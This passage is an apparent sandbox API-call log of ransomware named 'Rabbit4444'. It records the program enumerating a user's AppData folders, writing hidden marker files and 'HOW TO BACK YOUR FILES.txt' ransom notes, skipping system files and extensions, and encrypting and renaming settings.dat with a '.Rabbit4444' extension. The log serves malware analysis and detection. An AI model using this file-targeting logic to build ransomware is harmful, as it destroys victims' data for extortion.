nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0066.866] FindClose (in: hFindFile=0x102a90 | out: hFindFile=0x102a90) returned 1 [0066.866] lstrcpyW (in: lpString1=0x130ec02, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0066.866] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\TempState\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.holographicfirstrun_cw5n1h2txyewy\\tempstate\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0066.866] CreateFileMappingW (hFile=0x228, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x27c [0066.866] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0066.867] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0066.867] CloseHandle (hObject=0x27c) returned 1 [0066.867] CloseHandle (hObject=0x228) returned 1 [0066.867] GetCurrentThreadId () returned 0xd98 [0066.867] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122348 [0066.867] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\SystemAppData", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\SystemAppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\SystemAppData" [0066.867] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11bf88 | out: hHeap=0xe0000) returned 1 [0066.867] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122340 | out: hHeap=0xe0000) returned 1 [0066.867] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\SystemAppData" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\SystemAppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\SystemAppData" [0066.867] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\SystemAppData", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\SystemAppData\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\SystemAppData\\" [0066.867] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\SystemAppData\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\SystemAppData\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\SystemAppData\\.BFC0E91B00AE8A0620D3" [0066.867] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\SystemAppData\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.holographicfirstrun_cw5n1h2txyewy\\systemappdata\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0066.869] WriteFile (in: hFile=0x228, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0066.871] FlushFileBuffers (hFile=0x228) returned 1 [0066.872] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\SystemAppData\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0066.873] CloseHandle (hObject=0x228) returned 1 [0066.873] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\SystemAppData") returned 104 [0066.873] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.873] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\SystemAppData\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x75e25670, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x75e25670, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf12cfac7, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102510 [0066.873] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.873] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.873] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0066.873] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0066.873] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x75e25670, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x75e25670, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf12cfac7, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0066.873] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.873] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.873] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0066.874] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0066.874] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0066.874] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf12cfac7, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf12cfac7, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf12f5c46, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0066.874] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.874] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0066.874] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf12cfac7, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf12cfac7, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf12f5c46, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0066.874] FindClose (in: hFindFile=0x102510 | out: hFindFile=0x102510) returned 1 [0066.874] lstrcpyW (in: lpString1=0x130ec0a, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0066.874] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\SystemAppData\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.holographicfirstrun_cw5n1h2txyewy\\systemappdata\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0066.874] CreateFileMappingW (hFile=0x228, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x27c [0066.874] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0066.875] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0066.875] CloseHandle (hObject=0x27c) returned 1 [0066.875] CloseHandle (hObject=0x228) returned 1 [0066.875] GetCurrentThreadId () returned 0xd98 [0066.875] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122188 [0066.875] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\Settings", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\Settings") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\Settings" [0066.875] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x115ea0 | out: hHeap=0xe0000) returned 1 [0066.875] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122180 | out: hHeap=0xe0000) returned 1 [0066.875] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\Settings" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\Settings") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\Settings" [0066.875] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\Settings", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\Settings\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\Settings\\" [0066.875] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\Settings\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\Settings\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\Settings\\.BFC0E91B00AE8A0620D3" [0066.875] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\Settings\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.holographicfirstrun_cw5n1h2txyewy\\settings\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0066.877] WriteFile (in: hFile=0x228, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0066.879] FlushFileBuffers (hFile=0x228) returned 1 [0066.880] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\Settings\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0066.880] CloseHandle (hObject=0x228) returned 1 [0066.881] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\Settings") returned 99 [0066.881] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.881] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\Settings\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x75dff3f8, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x75e25670, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf12f5c46, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1026d0 [0066.881] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.881] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.881] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0066.881] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0066.881] FindNextFileW (in: hFindFile=0x1026d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x75dff3f8, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x75e25670, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf12f5c46, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0066.881] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.881] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.881] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0066.881] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0066.881] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0066.881] FindNextFileW (in: hFindFile=0x1026d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf12f5c46, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf12f5c46, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf12f5c46, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0066.881] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.881] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0066.881] FindNextFileW (in: hFindFile=0x1026d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x75e25670, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x75e25670, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x75e25670, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="roaming.lock", cAlternateFileName="ROAMIN~1.LOC")) returned 1 [0066.881] lstrcmpiW (lpString1="roaming.lock", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0066.881] lstrcmpiW (lpString1="roaming.lock", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0066.882] lstrcmpiW (lpString1="roaming.lock", lpString2="Rabbit4444.exe") returned 1 [0066.882] lstrcmpiW (lpString1="roaming.lock", lpString2=".") returned 1 [0066.882] lstrcmpiW (lpString1="roaming.lock", lpString2="..") returned 1 [0066.882] lstrcmpiW (lpString1="roaming.lock", lpString2="windows") returned -1 [0066.882] lstrcmpiW (lpString1="roaming.lock", lpString2="bootmgr") returned 1 [0066.882] lstrcmpiW (lpString1="roaming.lock", lpString2="pagefile.sys") returned 1 [0066.882] lstrcmpiW (lpString1="roaming.lock", lpString2="boot") returned 1 [0066.882] lstrcmpiW (lpString1="roaming.lock", lpString2="ids.txt") returned 1 [0066.882] lstrcmpiW (lpString1="roaming.lock", lpString2="NTUSER.DAT") returned 1 [0066.882] lstrcpyW (in: lpString1=0x130ec00, lpString2="roaming.lock" | out: lpString1="roaming.lock") returned="roaming.lock" [0066.882] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\Settings\\roaming.lock", dwFileAttributes=0x0) returned 1 [0066.883] lstrlenW (lpString="roaming.lock") returned 12 [0066.883] lstrlenW (lpString="Rabbit4444") returned 10 [0066.883] lstrcmpiW (lpString1="aming.lock", lpString2="Rabbit4444") returned -1 [0066.883] lstrlenW (lpString=".dll") returned 4 [0066.883] lstrcmpiW (lpString1="lock", lpString2=".dll") returned 1 [0066.883] lstrlenW (lpString=".lnk") returned 4 [0066.883] lstrcmpiW (lpString1="lock", lpString2=".lnk") returned 1 [0066.883] lstrlenW (lpString=".ini") returned 4 [0066.884] lstrcmpiW (lpString1="lock", lpString2=".ini") returned 1 [0066.884] lstrlenW (lpString=".sys") returned 4 [0066.884] lstrcmpiW (lpString1="lock", lpString2=".sys") returned 1 [0066.884] FindNextFileW (in: hFindFile=0x1026d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x75e25670, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x75e25670, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x55d5013a, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.dat", cAlternateFileName="")) returned 1 [0066.884] lstrcmpiW (lpString1="settings.dat", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0066.884] lstrcmpiW (lpString1="settings.dat", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0066.884] lstrcmpiW (lpString1="settings.dat", lpString2="Rabbit4444.exe") returned 1 [0066.884] lstrcmpiW (lpString1="settings.dat", lpString2=".") returned 1 [0066.884] lstrcmpiW (lpString1="settings.dat", lpString2="..") returned 1 [0066.884] lstrcmpiW (lpString1="settings.dat", lpString2="windows") returned -1 [0066.884] lstrcmpiW (lpString1="settings.dat", lpString2="bootmgr") returned 1 [0066.884] lstrcmpiW (lpString1="settings.dat", lpString2="pagefile.sys") returned 1 [0066.884] lstrcmpiW (lpString1="settings.dat", lpString2="boot") returned 1 [0066.884] lstrcmpiW (lpString1="settings.dat", lpString2="ids.txt") returned 1 [0066.884] lstrcmpiW (lpString1="settings.dat", lpString2="NTUSER.DAT") returned 1 [0066.884] lstrcpyW (in: lpString1=0x130ec00, lpString2="settings.dat" | out: lpString1="settings.dat") returned="settings.dat" [0066.884] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\Settings\\settings.dat", dwFileAttributes=0x0) returned 1 [0066.884] lstrlenW (lpString="settings.dat") returned 12 [0066.884] lstrlenW (lpString="Rabbit4444") returned 10 [0066.884] lstrcmpiW (lpString1="ttings.dat", lpString2="Rabbit4444") returned 1 [0066.884] lstrlenW (lpString=".dll") returned 4 [0066.884] lstrcmpiW (lpString1=".dat", lpString2=".dll") returned -1 [0066.884] lstrlenW (lpString=".lnk") returned 4 [0066.884] lstrcmpiW (lpString1=".dat", lpString2=".lnk") returned -1 [0066.884] lstrlenW (lpString=".ini") returned 4 [0066.884] lstrcmpiW (lpString1=".dat", lpString2=".ini") returned -1 [0066.884] lstrlenW (lpString=".sys") returned 4 [0066.884] lstrcmpiW (lpString1=".dat", lpString2=".sys") returned -1 [0066.884] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\Settings\\settings.dat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.holographicfirstrun_cw5n1h2txyewy\\settings\\settings.dat"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0066.885] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0066.885] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15819587876) returned 1 [0066.885] GetFileSizeEx (in: hFile=0x27c, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=8192) returned 1 [0066.885] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0066.885] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101d10 [0066.885] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2300, lpName=0x0) returned 0x260 [0066.886] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2300) returned 0x70000 [0066.889] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0066.889] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0066.889] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0066.889] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109028 [0066.889] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0066.890] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0066.890] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0066.890] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0066.890] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15820040343) returned 1 [0066.890] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0066.890] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101d10 | out: hHeap=0xe0000) returned 1 [0066.890] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0066.890] CloseHandle (hObject=0x260) returned 1 [0066.890] CloseHandle (hObject=0x27c) returned 1 [0066.890] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\Settings\\settings.dat.Rabbit4444") returned 123 [0066.890] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\Settings\\settings.dat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.holographicfirstrun_cw5n1h2txyewy\\settings\\settings.dat"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\Settings\\settings.dat.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.holographicfirstrun_cw5n1h2txyewy\\settings\\settings.dat.rabbit4444"), dwFlags=0x1) returned 1 [0066.892] FindNextFileW (in: hFindFile=0x1026d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x75e25670, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x75e25670, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x55d5013a, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.dat", cAlternateFileName="")) returned 0 [0066.892] FindClose (in: hFindFile=0x1026d0 | out: hFindFile=0x1026d0) returned 1 [0066.892] lstrcpyW (in: lpString1=0x130ec00, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0066.892] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\Settings\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.holographicfirstrun_cw5n1h2txyewy\\settings\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0066.893] CreateFileMappingW (hFile=0x228, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x27c [0066.893] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0066.894] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0066.894] CloseHandle (hObject=0x27c) returned 1 [0066.894] CloseHandle (hObject=0x228) returned 1 [0066.894] GetCurrentThreadId () returned 0xd98 [0066.894] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x121fa8 [0066.894] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\RoamingState", iMaxLength=2048 | out: 